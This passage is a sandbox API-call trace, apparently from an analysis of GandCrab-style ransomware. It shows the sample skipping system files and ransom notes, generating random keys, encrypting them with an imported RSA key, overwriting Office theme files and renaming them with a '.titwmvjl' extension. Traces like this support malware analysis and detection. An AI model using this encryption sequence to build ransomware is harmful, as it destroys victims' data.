(lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="ntuser.dat") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="iconcache.db") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="bootsect.bak") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="boot.ini") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="ntuser.dat.log") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="thumbs.db") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="ntldr") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="NTDETECT.COM") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="Bootfont.bin") returned 1 [0075.840] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned 131 [0075.840] lstrlenW (lpString=".thmx") returned 5 [0075.840] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.841] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0075.841] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.841] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.841] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033919[[fn=circuit]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0075.842] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.842] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0075.865] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.865] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.865] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.866] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.866] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.866] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.866] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0075.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.866] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.866] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.867] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.867] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.867] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.867] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.867] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0075.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.868] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.868] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.868] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.868] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5033f8) returned 1 [0075.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.869] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.869] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.869] GetLastError () returned 0x0 [0075.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.869] CryptDestroyKey (hKey=0x5033f8) returned 1 [0075.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.869] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.870] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.870] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5033f8) returned 1 [0075.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.870] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.870] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.871] GetLastError () returned 0x0 [0075.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.871] CryptDestroyKey (hKey=0x5033f8) returned 1 [0075.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.871] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.871] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0075.871] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0075.871] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0075.912] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.913] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0075.920] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.920] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0075.921] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.925] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.929] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.929] CloseHandle (hObject=0x2ec) returned 1 [0075.955] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033919[[fn=circuit]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033919[[fn=circuit]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0075.956] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.957] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0075.957] lstrcmpW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2=".") returned 1 [0075.957] lstrcmpW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="..") returned 1 [0075.957] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033921[[fn=Damask]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx" [0075.957] lstrlenW (lpString=".titwmvjl") returned 9 [0075.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned 130 [0075.957] VirtualAlloc (lpAddress=0x0, dwSize=0x144, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0075.957] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx.titwmvjl") returned 139 [0075.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned 130 [0075.957] lstrlenW (lpString=".thmx") returned 5 [0075.957] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.957] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0075.957] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0075.957] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned 130 [0075.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned 130 [0075.957] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="desktop.ini") returned 1 [0075.957] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="autorun.inf") returned 1 [0075.957] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="ntuser.dat") returned 1 [0075.957] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="iconcache.db") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="bootsect.bak") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="boot.ini") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="ntuser.dat.log") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="thumbs.db") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="ntldr") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="NTDETECT.COM") returned 1 [0075.958] lstrcmpiW (lpString1="TM04033921[[fn=Damask]].thmx", lpString2="Bootfont.bin") returned 1 [0075.958] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned 130 [0075.958] lstrlenW (lpString=".thmx") returned 5 [0075.958] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.958] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0075.958] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.959] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.959] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033921[[fn=damask]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0075.959] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.959] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0075.972] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.972] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.972] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.973] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.973] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.973] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.973] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0075.973] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.973] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.973] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.974] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.974] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.975] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.975] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.975] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0075.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.975] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.975] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.975] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.976] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0075.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.976] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.977] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.977] GetLastError () returned 0x0 [0075.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.977] CryptDestroyKey (hKey=0x503738) returned 1 [0075.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.977] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.978] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.978] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5032f8) returned 1 [0075.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.979] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.979] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.979] GetLastError () returned 0x0 [0075.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.979] CryptDestroyKey (hKey=0x5032f8) returned 1 [0075.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.979] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.979] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0075.980] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0075.980] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0076.039] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.039] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0076.143] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.143] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0076.155] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.159] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.162] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.163] CloseHandle (hObject=0x2ec) returned 1 [0076.213] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033921[[fn=damask]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033921[[fn=damask]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0076.214] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.214] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0076.214] lstrcmpW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2=".") returned 1 [0076.214] lstrcmpW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="..") returned 1 [0076.214] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033925[[fn=Droplet]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx" [0076.214] lstrlenW (lpString=".titwmvjl") returned 9 [0076.214] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned 131 [0076.214] VirtualAlloc (lpAddress=0x0, dwSize=0x146, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0076.215] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx.titwmvjl") returned 140 [0076.215] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned 131 [0076.215] lstrlenW (lpString=".thmx") returned 5 [0076.215] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0076.215] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0076.215] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0076.215] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.215] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned 131 [0076.215] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned 131 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="desktop.ini") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="autorun.inf") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="ntuser.dat") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", 